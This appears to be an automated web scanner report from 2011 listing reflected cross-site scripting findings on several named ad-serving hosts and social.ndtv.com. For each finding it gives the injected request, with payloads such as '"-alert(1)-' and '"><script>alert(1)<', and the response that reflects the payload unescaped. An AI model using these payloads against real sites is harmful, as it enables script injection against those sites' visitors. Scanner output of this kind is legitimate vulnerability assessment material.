HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:09:31 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:09:31 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28277 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai3a3fb"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserverec |
Path: | /nai/daa.php |
GET /nai/daa.php7b87f"-alert(1)- Host: nai.adserverec.adtechus Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:10:19 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:10:19 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28277 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... lamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/daa.php7b87f"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserverwc |
Path: | /nai/daa.php |
GET /nai418f5"-alert(1)- Host: nai.adserverwc.adtechus Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:10:24 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:10:24 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28277 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai418f5"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserverwc |
Path: | /nai/daa.php |
GET /nai/daa.php69437"-alert(1)- Host: nai.adserverwc.adtechus Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:11:51 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:11:51 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28277 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... lamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/daa.php69437"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adsonar.com |
Path: | /nai/daa.php |
GET /naiecff2"-alert(1)- Host: nai.adsonar.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:10:25 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:10:25 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28277 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/naiecff2"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adsonar.com |
Path: | /nai/daa.php |
GET /nai/daa.php5e7c5"-alert(1)- Host: nai.adsonar.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:11:52 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:11:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28277 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... lamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/daa.php5e7c5"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adtech.de |
Path: | /nai/daa.php |
GET /nai7c2ca"-alert(1)- Host: nai.adtech.de Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4E5FAC156E651A4 |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:10:55 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:10:55 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28277 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai7c2ca"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adtech.de |
Path: | /nai/daa.php |
GET /nai/daa.phpe921f"-alert(1)- Host: nai.adtech.de Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4E5FAC156E651A4 |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:12:14 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:12:14 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28277 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... lamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/daa.phpe921f"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /nai/daa.php |
GET /nai38214"-alert(1)- Host: nai.glb.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:10:12 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:10:12 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28277 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai38214"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /nai/daa.php |
GET /nai/daa.phpd6836"-alert(1)- Host: nai.glb.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:11:28 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:11:29 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28275 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... lamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/daa.phpd6836"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.tacoda.at |
Path: | /nai/daa.php |
GET /nai50d49"-alert(1)- Host: nai.tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: eadx=x; ATTACID=a3Z0aWQ9MTc2 |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:14:18 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:14:18 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28277 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai50d49"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.tacoda.at |
Path: | /nai/daa.php |
GET /nai/daa.phpfa787"-alert(1)- Host: nai.tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: eadx=x; ATTACID=a3Z0aWQ9MTc2 |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:15:04 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:15:04 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28277 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... lamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/daa.phpfa787"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.adsafep |
Path: | /jspix |
GET /jspix?anId=140d5008"-alert(1)- Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://web.adblade.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=DF6CC77EA Content-Type: text/javascript Date: Sun, 04 Sep 2011 02:39:45 GMT Connection: close var adsafeVisParams = { mode : "jspix", jsref : "http://web.adblade.com adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafe reqquery : "anId=140d5008"-alert(1)- debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000", asid : "gsnryweo" }; (function(){var N="3.12";var v=(adsafeVisParams.debug= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.adsafep |
Path: | /jspix |
GET /jspix?anId=140&pubId Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://web.adblade.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=EAC9C268E Content-Type: text/javascript Date: Sun, 04 Sep 2011 02:39:47 GMT Connection: close var adsafeVisParams = { mode : "jspix", jsref : "http://web.adblade.com adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafe reqquery : "anId=140&pubId=11479 debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000", asid : "gsnryxpe" }; (function(){var N="3.12";var v=(adsafeVisParams.debug= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.adsafep |
Path: | /jspix |
GET /jspix?anId=140&pubId Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://web.adblade.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=271FCB862 Content-Type: text/javascript Date: Sun, 04 Sep 2011 02:39:47 GMT Connection: close var adsafeVisParams = { mode : "jspix", jsref : "http://web.adblade.com adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafe reqquery : "anId=140&pubId=11479 debug : "false", allowPhoneHome : "true", phoneHomeDelay : "3000", asid : "gsnryydy" }; (function(){var N="3.12";var v=(adsafeVisParams.debug= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.adsafep |
Path: | /jspix |
GET /jspix?anId=140&pubId Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://web.adblade.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=331450ED8 Content-Type: text/javascript Date: Sun, 04 Sep 2011 02:39:46 GMT Connection: close var adsafeVisParams = { mode : "jspix", jsref : "http://web.adblade.com adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafe reqquery : "anId=140&pubId=11479b6f98"-alert(1)- debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000", asid : "gsnryx15" }; (function(){var N="3.12";var v=(adsafeVisParams.debug= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://rtb0.doubleverify |
Path: | /rtb.ashx/verifyc |
GET /rtb.ashx/verifyc?ctx Host: rtb0.doubleverify.com Proxy-Connection: keep-alive Referer: http://cdn.optmd.com/V2 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __unam=2733665-13225 |
HTTP/1.1 200 OK Connection: close Content-Type: text/javascript; charset=utf-8 Server: Microsoft-IIS/7.0 Date: Sun, 04 Sep 2011 02:39:44 GMT Content-Length: 74 __verify_callback |
Severity: | High |
Confidence: | Certain |
Host: | http://social.ndtv.com |
Path: | /NDTVProfit |
GET /NDTVProfit?6e899"><script>alert(1)< Host: social.ndtv.com Proxy-Connection: keep-alive Referer: http://social.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=165355488 |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny10 Content-Length: 62213 Expires: Sun, 04 Sep 2011 03:39:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 04 Sep 2011 03:39:25 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="/NDTVProfit&6e899"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://social.ndtv.com |
Path: | /groups.php |
GET /groups.php?83e36"><script>alert(1)< Host: social.ndtv.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny10 Expires: Sun, 04 Sep 2011 04:19:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 04 Sep 2011 04:19:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 60108 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <fb:like href="http://social.ndtv ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://social.ndtv.com |
Path: | /home.php |
GET /home.php?df4e4"><script>alert(1)< Host: social.ndtv.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=126395663 |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny10 Content-Length: 22754 Expires: Sun, 04 Sep 2011 03:32:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 04 Sep 2011 03:32:52 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <fb:like href="http://social.ndtv ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://social.ndtv.com |
Path: | /static/Comment/Form/ |
GET /static/Comment/Form/? Host: social.ndtv.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Pragma: no-cache Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny10 Content-Length: 14432 Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0 Date: Sun, 04 Sep 2011 02:43:20 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... '; params += '&title=' + '48 hours on, Mumbai airport\'s main runway still shut'; params += '&identifier=' + 'story-131142'; params += '&ctype=' + 'storyacfa9</script><script params += '&site=' + 'ndtv'; if(!o.cache){ params += '&rm=' + Math.random(); params += '&tt=' + (new Date).getTime(); ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://social.ndtv.com |
Path: | /static/Comment/Form/ |
GET /static/Comment/Form/? Host: social.ndtv.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Pragma: no-cache Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny10 Content-Length: 14419 Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0 Date: Sun, 04 Sep 2011 02:43:18 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="hidden" name="ctype" value="storyaab7e"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://social.ndtv.com |
Path: | /static/Comment/Form/ |
GET /static/Comment/Form/? Host: social.ndtv.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Pragma: no-cache Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny10 Content-Length: 14419 Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0 Date: Sun, 04 Sep 2011 02:43:24 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="hidden" name="identifier" value="story-131142fec6d"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://social.ndtv.com |
Path: | /static/Comment/Form/ |
